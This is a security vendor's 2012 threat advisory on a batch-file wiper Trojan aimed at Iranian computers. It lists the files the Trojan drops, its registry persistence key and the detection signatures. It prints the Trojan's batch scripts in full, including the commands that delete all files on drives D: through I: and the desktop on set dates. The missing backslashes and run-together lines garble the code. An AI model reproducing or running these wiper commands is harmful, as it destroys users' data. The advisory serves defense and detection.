New File Wiper Trojan targeting Iran (Dec 21, 2012)
The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: Delete files on a range of specified drives on specified dates. This can be on remote storage devices or local external storage as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.
Infection cycle:
The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:
- %SYSTEM32%jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%SLEEP.EXE [non-malicious sleep utility]
- %USERPROFILE%Local SettingsTempE.tmpjuboot.bat [dropped by juboot.exe]
- %USERPROFILE%Local SettingsTemp11.tmpjucheck.bat [dropped by jucheck.exe]
The Trojan adds the following key to the windows registry to enable startup after reboot:
- HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun jucheck.exe “%SYSTEM32%jucheck.exe”
The file juboot.bat contains the following data that is used to initiate infection:
@echo off & setlocalsleep for 2REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d "%systemroot%system32jucheck.exe" /fstart "" /D"%systemroot%system32" "jucheck.exe"The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:
@echo off & setlocalsleep for 2del "%systemroot%system32juboot.exe" /q /s /fdel "%userprofile%Start MenuProgramsStartupGrooveMonitor.exe" /q /s /fif "%date%"=="Mon 12/10/2012" goto yesif "%date%"=="Tue 12/11/2012" goto yesif "%date%"=="Wed 12/12/2012" goto yesif "%date%"=="Mon 01/21/2013" goto yesif "%date%"=="Tue 01/22/2013" goto yesif "%date%"=="Wed 01/23/2013" goto yesif "%date%"=="Mon 05/06/2013" goto yesif "%date%"=="Tue 05/07/2013" goto yesif "%date%"=="Wed 05/08/2013" goto yesif "%date%"=="Mon 07/22/2013" goto yesif "%date%"=="Tue 07/23/2013" goto yesif "%date%"=="Wed 07/24/2013" goto yesif "%date%"=="Mon 11/11/2013" goto yesif "%date%"=="Tue 11/12/2013" goto yesif "%date%"=="Wed 11/13/2013" goto yesif "%date%"=="Mon 02/03/2014" goto yesif "%date%"=="Tue 02/04/2014" goto yesif "%date%"=="Wed 02/05/2014" goto yesif "%date%"=="Mon 05/05/2014" goto yesif "%date%"=="Tue 05/06/2014" goto yesif "%date%"=="Wed 05/07/2014" goto yesif "%date%"=="Mon 08/11/2014" goto yesif "%date%"=="Tue 08/12/2014" goto yesif "%date%"=="Wed 08/13/2014" goto yesif "%date%"=="Mon 02/02/2015" goto yesif "%date%"=="Tue 02/03/2015" goto yesif "%date%"=="Wed 02/04/2015" goto yesgoto no:yessleep for 3000IF EXIST d: del "d:*.*" /q /s /fIF EXIST d: Chkdsk d:IF EXIST e: del "e:*.*" /q /s /fIF EXIST e: Chkdsk e:IF EXIST f: del "f:*.*" /q /s /fIF EXIST f: Chkdsk f:IF EXIST g: del "g:*.*" /q /s /fIF EXIST g: Chkdsk g:IF EXIST h: del "h:*.*" /q /s /fIF EXIST h: Chkdsk h:IF EXIST i: del "i:*.*" /q /s /fIF EXIST i: Chkdsk i:del "%userprofile%Desktop*.*" /q /s /f\start calc:noThe .bat files are deleted after execution.
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: DelFiles.NBV (Trojan)
- GAV: Batchwiper.A (Trojan)
